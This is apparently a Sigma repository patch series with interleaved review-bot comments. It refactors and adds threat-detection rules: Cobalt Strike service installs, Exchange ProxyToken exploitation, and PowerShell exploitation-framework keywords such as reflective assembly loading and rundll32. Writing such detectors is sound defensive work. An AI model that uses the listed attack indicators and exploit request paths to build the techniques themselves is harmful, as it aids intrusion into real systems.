@@ -11,6 +12,13 @@ tags: logsource: product: windows service: security +falsepositives: + - Terminal servers + - Jump servers + - Other multiuser systems like Citrix server farms + - Workstations with frequently changing users +level: medium +--- detection: selection1: EventID: @@ -18,17 +26,12 @@ detection: - 4625 TargetUserName: '*' WorkstationName: '*' + condition: selection1 | count(TargetUserName) by WorkstationName > 3 +--- +detection: selection2: EventID: 4776 TargetUserName: '*' Workstation: '*' timeframe: 24h - condition: - - selection1 | count(TargetUserName) by WorkstationName > 3 - - selection2 | count(TargetUserName) by Workstation > 3 -falsepositives: - - Terminal servers - - Jump servers - - Other multiuser systems like Citrix server farms - - Workstations with frequently changing users -level: medium \ No newline at end of file + condition: selection2 | count(TargetUserName) by Workstation > 3 From 718b44c38af6062b9b140da04f6565b757690eb7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 08:57:25 +0200 Subject: [PATCH 0619/1367] fix List values must be strings or numbers (46) --- rules/web/web_fortinet_cve_2021_22123_exploit.yml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/rules/web/web_fortinet_cve_2021_22123_exploit.yml b/rules/web/web_fortinet_cve_2021_22123_exploit.yml index f50aa501..2f7439b7 100644 --- a/rules/web/web_fortinet_cve_2021_22123_exploit.yml +++ b/rules/web/web_fortinet_cve_2021_22123_exploit.yml @@ -6,6 +6,7 @@ references: - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection author: Bhabesh Raj, Florian Roth date: 2021/08/19 +modified: 2021/08/29 tags: - attack.initial_access - attack.t1190 
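Review bot: After the split into two documents only the second `detection` keeps `timeframe: 24h`; the first document, ending in `condition: selection1 | count(TargetUserName) by WorkstationName > 3`, now aggregates without a time window, which changes the meaning of the 4625 branch. Add `timeframe: 24h` to the first detection block next to its `condition:`. Moving `falsepositives` and `level` into the global section in the preceding hunk is fine, since `action: global` applies them to both documents.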
@@ -13,15 +14,12 @@ logsource: category: webserver detection: selection: - c-uri|contains: - - '/api/v2.0/user/remoteserver.saml' - cs-method: - - POST + c-uri|contains: '/api/v2.0/user/remoteserver.saml' + cs-method: POST filter1: cs-referer|contains: '/root/user/remote-user/saml-user/' filter2: - cs-referer: - - null + cs-referer: null condition: selection and not filter1 and not filter2 fields: - client_ip From 5ad29cf0c289c05b40be840e27c489dedbca6c20 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 09:03:50 +0200 Subject: [PATCH 0620/1367] fix Base backend doesn't support multiple conditions (29) --- rules/network/net_susp_network_scan.yml | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/rules/network/net_susp_network_scan.yml b/rules/network/net_susp_network_scan.yml index 2fdbdbe3..ae8770e6 100644 --- a/rules/network/net_susp_network_scan.yml +++ b/rules/network/net_susp_network_scan.yml @@ -1,3 +1,4 @@ +action: global title: Network Scans id: fab0ddf0-b8a9-4d70-91ce-a20547209afb status: experimental @@ -7,13 +8,6 @@ date: 2017/02/19 modified: 2020/08/27 logsource: category: firewall -detection: - selection: - action: denied - timeframe: 24h - condition: - - selection | count(dst_port) by src_ip > 10 - - selection | count(dst_ip) by src_ip > 10 fields: - src_ip - dst_ip @@ -25,4 +19,16 @@ falsepositives: level: medium tags: - attack.discovery - - attack.t1046 \ No newline at end of file + - attack.t1046 +--- +detection: + selection: + action: denied + timeframe: 24h + condition: selection | count(dst_port) by src_ip > 10 +--- +detection: + selection: + action: denied + timeframe: 24h + condition: selection | count(dst_ip) by src_ip > 10 \ No newline at end of file From 772fe06e1017994c1ec6ee227beb70bba33ebc2b Mon Sep 17 00:00:00 2001 
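Review bot: `filter2: cs-referer: null` together with the existing `condition: selection and not filter1 and not filter2` excludes every request that carries no Referer header; since `filter1` already removes the legitimate UI traffic, confirm that dropping referer-less requests as well is intended and not an inverted clause, because those are exactly the requests the UI would not generate. Collapsing the one-element lists to scalars (`c-uri|contains: '/api/v2.0/user/remoteserver.saml'`, `cs-method: POST`) is otherwise a faithful change.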
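Review bot: The rule body changes substantially (global split, two detection documents) but the context line `modified: 2020/08/27` is left untouched, whereas the other rules edited in this series bump `modified` to the edit date; set `modified: 2021/08/29`. Duplicating `selection:` and `timeframe: 24h` in both documents is required by the one-condition-per-document layout, so that part is fine.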
From: frack113 Date: Sun, 29 Aug 2021 09:10:30 +0200 Subject: [PATCH 0621/1367] fix Backend does not support map values of type (57) --- rules/cloud/gworkspace/gworkspace_mfa_disabled.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml b/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml index 3730e5c1..ec179898 100644 --- a/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml +++ b/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml @@ -4,6 +4,7 @@ description: Detects when multi-factor authentication (MFA) is disabled. author: Austin Songer status: experimental date: 2021/08/26 +modified: 2021/08/29 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION @@ -17,7 +18,7 @@ detection: - ENFORCE_STRONG_AUTHENTICATION - ALLOW_STRONG_AUTHENTICATION eventValue: - new_value: false + new_value: 'false' condition: all of them level: medium tags: From 83e2f3640c602da2bfe468ed64ad3280b92aa334 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 09:24:43 +0200 Subject: [PATCH 0622/1367] add lacework backend --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index ea442b75..6f5327a2 100644 --- a/Makefile +++ b/Makefile 
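Review bot: Quoting the value as `new_value: 'false'` satisfies the backend's type check, but it also turns the comparison into a string match; if the Google Workspace admin audit events in the target index store `new_value` as a JSON boolean, the generated query may never match. Worth confirming against a real event before relying on the rule, and a short comment on the line (`# quoted because backends reject boolean map values`) would explain the otherwise odd-looking quoting.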
@@ -48,6 +48,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t splunkxml -c tools/config/splunk-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t splunkdm -c tools/config/splunk-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t logpoint -c tools/config/logpoint-windows.yml rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t lacework rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t mdatp rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala-rule rules/ > /dev/null From 2e79998cc706e3c56ecfe97e4ac75b2798568f57 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 11:47:47 +0200 Subject: [PATCH 0623/1367] add devo COVERAGE --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index 6f5327a2..e4520443 100644 --- a/Makefile +++ b/Makefile @@ -48,6 +48,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t splunkxml -c tools/config/splunk-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t splunkdm -c tools/config/splunk-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t logpoint -c tools/config/logpoint-windows.yml rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t devo -c tools/config/devo-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t lacework rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t mdatp rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala rules/ > /dev/null From 8ad2c722d62fcec3a39e0ff253821f8aa8c8566d Mon Sep 17 00:00:00 2001 
From: frack113 Date: Sun, 29 Aug 2021 12:19:49 +0200 Subject: [PATCH 0624/1367] add uberagent COVERAGE --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index e4520443..e8390afd 100644 --- a/Makefile +++ b/Makefile @@ -51,6 +51,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t devo -c tools/config/devo-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t lacework rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t mdatp rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t uberagent rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala-rule rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala --backend-config tests/backend_config.yml rules/windows/process_creation/ > /dev/null From 5f271bf33437527faac1e0b0c0fea428e94624d4 Mon Sep 17 00:00:00 2001 From: Nico <44952997+ncrqnt@users.noreply.github.com> Date: Mon, 30 Aug 2021 08:29:07 +0200 Subject: [PATCH 0625/1367] add author field to elastic rule --- tools/sigma/backends/elasticsearch.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 76620993..b84773d1 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py 
@@ -1622,7 +1622,17 @@ class ElasticSearchRuleBackend(object): else: references.append(add_ref_yml) + # add author filed depending on data type in rule file + author = configs.get("author", "") + if isinstance(author, str): + author_list = author.split(', ') + elif isinstance(author, list): + author_list = author + else: + author_list = [] + rule = { + "author": author_list, "description": configs.get("description", ""), "enabled": True, "false_positives": falsepositives, From 00dec96245c7313bcdb9e3a02c5b003db4f36ef9 Mon Sep 17 00:00:00 2001 From: Nico <44952997+ncrqnt@users.noreply.github.com> Date: Mon, 30 Aug 2021 08:45:21 +0200 Subject: [PATCH 0626/1367] Add support for subtechniques --- tools/sigma/backends/elasticsearch.py | 40 ++++++++++++++++++++++++++- 1 file changed, 39 insertions(+), 1 deletion(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index b84773d1..b4768874 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1479,6 +1479,10 @@ class ElasticSearchRuleBackend(object): def create_threat_description(self, tactics_list, techniques_list): threat_list = list() + # sort lists for correct handling with subtechniques + tactics_list.sort(key=lambda x: x['external_id'], reverse=False) + techniques_list.sort(key=lambda x: x['technique_id'], reverse=False) + for tactic in tactics_list: temp_tactics = { "tactic": { 
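Review bot: `author.split(', ')` splits only on comma-plus-space, so `A,B` or `A ,B` stays a single entry and surrounding whitespace survives; `author_list = [a.strip() for a in author.split(',') if a.strip()]` is more forgiving and also drops empty items. The comment `# add author filed depending on data type in rule file` should read `field`. The enclosing method starts outside the hunk.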
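Review bot: `tactics_list.sort(...)` and `techniques_list.sort(...)` reorder the caller's lists in place, a side effect the name `create_threat_description` does not suggest; `tactics_list = sorted(tactics_list, key=lambda x: x['external_id'])` (and likewise for `techniques_list`) leaves the caller's data untouched, and `reverse=False` is the default and can be dropped. `key=lambda x: x['external_id']` also raises `KeyError` on an entry lacking that key, whereas the surrounding code reads these entries with `.get`. The method continues beyond the hunk.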
@@ -1496,6 +1500,23 @@ class ElasticSearchRuleBackend(object): "name": tech.get("technique", ""), "reference": tech.get("url", "") }) + elif re.match('[T][0-9]{4}.[0-9]{3}', tech.get("technique_id", ""), re.IGNORECASE): + # add subtechnique to main technique + technique = tech.get("technique_id", "").split(".")[0] + technique_entry = list(filter(lambda temp_techniques: temp_techniques['id'] == technique, temp_techniques)) + + if technique_entry: + index = temp_techniques.index(technique_entry[0]) + temp_subtechniques = temp_techniques[index].get("subtechnique", []) + temp_subtechniques.append( + { + "id": tech.get("technique_id", ""), + "name": tech.get("technique", ""), + "reference": tech.get("url", "") + } + ) + temp_techniques[index].update({"subtechnique": temp_subtechniques}) + temp_tactics.update({"technique": temp_techniques}) threat_list.append(temp_tactics) return threat_list @@ -1559,8 +1580,20 @@ class ElasticSearchRuleBackend(object): technics_list = list() new_tags = list() + # sort tags so it looks nice :) + tags.sort() + for tag in tags: tag = tag.replace("attack.", "") + # if there's a subtechnique, add main technique to the list if not already there + if re.match("[t][0-9]{4}.[0-9]{3}", tag, re.IGNORECASE): + technique = tag.split('.')[0] + if technique not in tags and technique.title() not in new_tags: + tech = self.find_technique(technique.title()) + if tech: + new_tags.append(technique.title()) + technics_list.append(tech) + if re.match("[t][0-9]{4}", tag, re.IGNORECASE): tech = self.find_technique(tag.title()) if tech: @@ -1582,8 +1615,13 @@ class ElasticSearchRuleBackend(object): else: tact = self.find_tactics(key_name=tag.title()) if tact: - new_tags.append(tag.title()) tactics_list.append(tact) + + # capitalize if not a MITRE CAR tag + if re.match("car.\d{4}-\d{2}-\d{3}", tag, re.IGNORECASE): + new_tags.append(tag) + else: + new_tags.append(tag.title()) if self.custom_tag: if ',' in self.custom_tag: 
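Review bot: The pattern `'[T][0-9]{4}.[0-9]{3}'` uses an unescaped `.`, which matches any character rather than the literal dot between technique and sub-technique; `r'T[0-9]{4}\.[0-9]{3}'` is what is meant, and the same unescaped dot appears in `"[t][0-9]{4}.[0-9]{3}"` in the next hunk and in `"car.\d{4}-\d{2}-\d{3}"` in the third. In `list(filter(lambda temp_techniques: temp_techniques['id'] == technique, temp_techniques))` the lambda parameter shadows the outer `temp_techniques`, which reads as a bug even though it works; `next((t for t in temp_techniques if t['id'] == technique), None)` says the same thing clearly. When the parent technique is absent from `temp_techniques` the sub-technique is silently dropped, so a log line or a fallback that appends it as a top-level technique would make that visible. `create_threat_description` starts outside this hunk.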
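Review bot: `if technique not in tags and technique.title() not in new_tags:` compares the stripped id (e.g. `t1548`) against `tags`, whose entries still carry the `attack.` prefix at this point (the prefix is removed into the local `tag` only), so the first test is always true and only the `new_tags` check prevents duplicates; compare against `'attack.' + technique` or drop the dead test. `tags.sort()` also reorders whatever list was passed in as `tags` in place; `for tag in sorted(tags):` gives the same traversal order without the side effect. The enclosing method begins and ends outside the hunk.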
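Review bot: `"car.\d{4}-\d{2}-\d{3}"` is a non-raw string containing `\d`, an invalid escape sequence that Python reports as a DeprecationWarning (a SyntaxWarning on recent versions) and will eventually reject; write it as `r"car\.\d{4}-\d{2}-\d{3}"`, which also fixes the unescaped dot. With indentation lost in this rendering I cannot tell whether the new `new_tags.append` block sits inside the `else:` branch or at loop level; if the latter, tags that matched neither a technique nor a tactic are now emitted in title case where the old code only appended when `find_tactics` returned something, and the earlier branches may append the same tag twice — please double-check the placement.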
From 1ded4eb9134b40a0dcb032fe9354f228c711b9c7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 30 Aug 2021 15:10:30 +0200 Subject: [PATCH 0627/1367] rules: cobalt strike rules refactored --- .../windows/builtin/win_cobaltstrike_service_installs.yml | 7 +++++-- .../process_creation/win_cobaltstrike_process_patterns.yml | 6 ++++++ 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index a52c5ed2..ce3b377b 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -5,8 +5,9 @@ author: Florian Roth, Wojciech Lesicki references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ + - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/05/26 -modified: 2021/08/09 +modified: 2021/08/30 tags: - attack.execution - attack.privilege_escalation @@ -19,7 +20,9 @@ logsource: service: system detection: selection_id: - EventID: 7045 + EventID: + - 7045 + - 4697 selection1: ServiceFileName|contains|all: - 'ADMIN$' diff --git a/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml index 0923753e..c36cf801 100644 --- a/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml @@ -5,7 +5,9 @@ description: Detects process patterns found in Cobalt Strike beacon activity (se author: Florian Roth references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ + - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/07/27 +modified: 2021/08/30 tags: - attack.execution logsource: 
@@ -27,6 +29,10 @@ detection: - '> \\.\pipe' - '\whoami.exe' ParentImage|endswith: '\dllhost.exe' + selection4: + Image|endswith: '\cmd.exe' + ParentImage|endswith: '\runonce.exe' + ParentCommandLine|endswith: '\runonce.exe' condition: 1 of them falsepositives: - Other programs that cause these patterns (please report) From 98de92ceaf75bf51ab3fff46d970bafe87843fd0 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 30 Aug 2021 15:17:53 +0200 Subject: [PATCH 0628/1367] refactor: global rule match on system and security --- .../win_cobaltstrike_service_installs.yml | 23 ++++++++++++------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index ce3b377b..9f81e307 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -1,3 +1,4 @@ +action: global title: CobaltStrike Service Installations id: 5a105d34-05fc-401e-8553-272b45c1522d description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement @@ -7,7 +8,6 @@ references: - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/05/26 -modified: 2021/08/30 tags: - attack.execution - attack.privilege_escalation @@ -15,14 +15,7 @@ tags: - attack.t1021.002 - attack.t1543.003 - attack.t1569.002 -logsource: - product: windows - service: system detection: - selection_id: - EventID: - - 7045 - - 4697 selection1: ServiceFileName|contains|all: - 'ADMIN$' 
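Review bot: `ParentCommandLine|endswith: '\runonce.exe'` only matches when the parent's command line is unquoted and has no arguments; a quoted invocation ends with `"`, so a list such as `- '\runonce.exe'` and `- '\runonce.exe"'` keeps the intent while tolerating quoting. Since `ParentImage|endswith: '\runonce.exe'` is already required, the command-line clause appears to be there to exclude runonce started with parameters — a short comment stating that would help the next reader.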
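Review bot: This hunk deletes `modified: 2021/08/30`, which the previous commit had just added, so the rule carries no modification date although its structure changed substantially; keep the line. Removing `logsource` and `selection_id` from the global part is consistent with re-adding them per document in the last hunk, so that part is fine.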
@@ -40,3 +33,17 @@ detection: falsepositives: - Unknown level: critical +--- +logsource: + product: windows + service: system +detection: + selection_id: + EventID: 7045 +--- +logsource: + product: windows + service: security +detection: + selection_id: + EventID: 4697 \ No newline at end of file From 4a4966af77583352cb05965a9a479124842e3da7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 30 Aug 2021 15:47:53 +0200 Subject: [PATCH 0629/1367] rule: ProxyToken CVE-2021-33766 Exchange --- ...b_cve_2021_33766_msexchange_proxytoken.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/web/web_cve_2021_33766_msexchange_proxytoken.yml diff --git a/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml b/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml new file mode 100644 index 00000000..07570ee0 --- /dev/null +++ b/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml @@ -0,0 +1,31 @@ +title: CVE-2021-33766 Exchange ProxyToken Exploitation +id: 56973b50-3382-4b56-bdf5-f51a3183797a +status: experimental +description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 +author: Florian Roth +date: 2021/08/30 +references: + - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection1: + cs-method: 'POST' + c-uri|contains|all: + - '/ecp/' + - '/RulesEditor/InboxRules.svc/NewObject' + sc-status: 500 + selection2: + c-uri|contains|all: + - 'SecurityToken=' + - '/ecp/' + condition: selection1 or selection2 +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: critical From af9392ba0f3970a0ec0efef552b10ecdbad20200 Mon Sep 17 00:00:00 2001 
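Review bot: The shared `ServiceFileName|contains|all` selection (outside this hunk) now has to resolve against two event sources, and as far as I recall the raw field holding the service binary path is named differently in the System 7045 event and the Security 4697 event, so the match depends on each backend's field mapping rather than on the rule text; a conversion per backend in use would confirm it, and a comment such as `# ServiceFileName is mapped per backend; 7045 and 4697 name the field differently` would record the dependency. The third document ends with `\ No newline at end of file`; adding the trailing newline keeps the file consistent with the other rules touched in this series. The `condition` that ties `selection_id` to the other selections is outside this hunk, so I could not verify that both new documents satisfy it.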
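Review bot: The `c-uri|contains` values (`/ecp/`, `/RulesEditor/InboxRules.svc/NewObject`, `SecurityToken=`) need to be matched case-insensitively to be reliable, because IIS resolves request paths without regard to case; Sigma's string matching is case-insensitive by specification, but some `webserver` backends compare `c-uri` literally, so this is worth confirming on the deployed backend. A short comment on `selection1`, e.g. `# case-insensitive match required: IIS paths are case-insensitive`, would record the assumption. `selection2` relies only on two substrings with no method or status constraint, so its false-positive profile differs markedly from `selection1`; the `description` could say which of the two is the high-confidence path.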
From: Florian Roth Date: Mon, 30 Aug 2021 16:12:42 +0200 Subject: [PATCH 0630/1367] refactor: add 500 status code in selection2 to avoid FPs with exploitation attempts --- rules/web/web_cve_2021_33766_msexchange_proxytoken.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml b/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml index 07570ee0..ad016091 100644 --- a/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml +++ b/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml @@ -2,7 +2,7 @@ title: CVE-2021-33766 Exchange ProxyToken Exploitation id: 56973b50-3382-4b56-bdf5-f51a3183797a status: experimental description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 -author: Florian Roth +author: Florian Roth, Max Altgelt, Christian Burkard date: 2021/08/30 references: - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server @@ -22,6 +22,7 @@ detection: c-uri|contains|all: - 'SecurityToken=' - '/ecp/' + sc-status: 500 condition: selection1 or selection2 fields: - c-ip From acf59f9795b6d1cfd61170b681777624d5f7205e Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 30 Aug 2021 19:49:44 +0200 Subject: [PATCH 0631/1367] Fix some errors --- .../powershell_suspicious_keywords.yml | 32 ++++++++++--------- .../powershell/powershell_wmimplant.yml | 2 ++ ...shell_wsman_com_provider_no_powershell.yml | 9 +++--- 3 files changed, 24 insertions(+), 19 deletions(-) diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index 35673048..17910236 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml 
@@ -3,7 +3,7 @@ id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: experimental description: Detects keywords that could indicate the use of some PowerShell exploitation framework date: 2019/02/11 -modified: 2021/08/18 +modified: 2021/08/30 author: Florian Roth, Perez Diego (@darkquassar) references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 @@ -17,21 +17,23 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Script block logging must be enabled for 4104 detection: - keywords: - - "System.Reflection.Assembly.Load($" - - "[System.Reflection.Assembly]::Load($" - - "[Reflection.Assembly]::Load($" - - "System.Reflection.AssemblyName" - - "Reflection.Emit.AssemblyBuilderAccess" - - "Runtime.InteropServices.DllImportAttribute" - - "SuspendThread" - - "rundll32" - # - "FromBase64" - - "Invoke-WMIMethod" - - "http://127.0.0.1" - condition: keywords + framework: + EventID: 4104 + ScriptBlockText|contains: + - "System.Reflection.Assembly.Load($" + - "[System.Reflection.Assembly]::Load($" + - "[Reflection.Assembly]::Load($" + - "System.Reflection.AssemblyName" + - "Reflection.Emit.AssemblyBuilderAccess" + - "Runtime.InteropServices.DllImportAttribute" + - "SuspendThread" + - "rundll32" + # - "FromBase64" + - "Invoke-WMIMethod" + - "http://127.0.0.1" + condition: framework falsepositives: - Penetration tests level: high diff --git a/rules/windows/powershell/powershell_wmimplant.yml b/rules/windows/powershell/powershell_wmimplant.yml index ec0915ff..9ed475bd 100644 --- a/rules/windows/powershell/powershell_wmimplant.yml +++ b/rules/windows/powershell/powershell_wmimplant.yml 
@@ -11,12 +11,14 @@ tags: - attack.t1086 #an old one author: NVISO date: 2020/03/26 +modified: 2021/08/30 logsource: product: windows service: powershell definition: Script block logging must be enabled detection: selection: + EventID: 4104 ScriptBlockText|contains: - "WMImplant" - " change_user " diff --git a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml b/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml index 7b26a54e..d3b87330 100644 --- a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml +++ b/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml @@ -3,7 +3,7 @@ id: df9a0e0e-fedb-4d6c-8668-d765dfc92aa7 description: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. status: experimental date: 2020/06/24 -modified: 2021/05/21 +modified: 2021/08/30 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -16,12 +16,13 @@ references: - https://github.com/bohops/WSMan-WinRM logsource: product: windows - service: powershell + service: powershell-classic + definition: fields have to be extract from event detection: selection: - - 'ProviderName=WSMan' + ProviderName: WSMan filter: - - 'HostApplication=*powershell' + HostApplication|contains: powershell condition: selection and not filter falsepositives: - Unknown From b36db223b1e1ea27e8ff10ad5b7b71e1a78a44af Mon Sep 17 00:00:00 2001 From: zazzzSec Date: Mon, 30 Aug 2021 21:06:57 -0400 Subject: [PATCH 0632/1367] fixing path wildcards that don't adhear to tool specifications --- tools/sigma/backends/carbonblack.py | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/tools/sigma/backends/carbonblack.py b/tools/sigma/backends/carbonblack.py index cf517577..e85d2346 100644 --- a/tools/sigma/backends/carbonblack.py +++ b/tools/sigma/backends/carbonblack.py 
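Review bot: `HostApplication|contains: powershell` is a substring test against the host's full command line, so it is broader than the `*powershell` suffix keyword it replaces: any host whose path or arguments contain the word (including `powershell_ise.exe` and a non-PowerShell host invoked with an argument mentioning it) is now excluded by the filter. If the intent is to exclude only the PowerShell executables, anchoring on the file name is more precise: `HostApplication|contains: ['\powershell.exe', '\powershell_ise.exe']`. The new `definition` line should read `fields have to be extracted from the event`. `condition: selection and not filter` is unchanged and works with either form.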
@@ -116,6 +116,14 @@ class CarbonBlackQueryBackend(CarbonBlackWildcardHandlingMixin, SingleTextQueryB strUnescapeMatch = self.unescapeCharacter(strMatch) val = val.replace(strMatch, '"{}"'.format(strUnescapeMatch)) return val.strip() + + def fixWildcards(self, val): + # prob a better way to do this with SigmaStartswithModifier/SigmaEndswithModifier? idk, fail fast! + if val.endswith("\\\\"): + val = val[:-1] + "*" + if val.startswith("\\\\") and not val.startswith("\\\\\\\\"): + val = val[2:] + return val def cleanValue(self, val): if "[1 to *]" in val: @@ -129,6 +137,7 @@ class CarbonBlackQueryBackend(CarbonBlackWildcardHandlingMixin, SingleTextQueryB val = self.cleanLeading(val) val = self.escapeCharacter(val) val = self.cleanWhitespace(val) + val = self.fixWildcards(val) return val def cleanIPRange(self, value): From 5508ff45b671ccedccebfdaff84197879eedf0f9 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Mon, 30 Aug 2021 21:47:36 -0600 Subject: [PATCH 0633/1367] Add files via upload --- ...ocess_Creations_by_Office_applications.yml | 39 +++++++++++++++ ...creations_with_Wmiprvse_parent_process.yml | 37 +++++++++++++++ ..._proxy executing_regsvr32_with_payload.yml | 47 +++++++++++++++++++ ...Applications_Spawning_WMI_command-line.yml | 36 ++++++++++++++ 4 files changed, 159 insertions(+) create mode 100644 rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml create mode 100644 rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml create mode 100644 rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml create mode 100644 rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml 
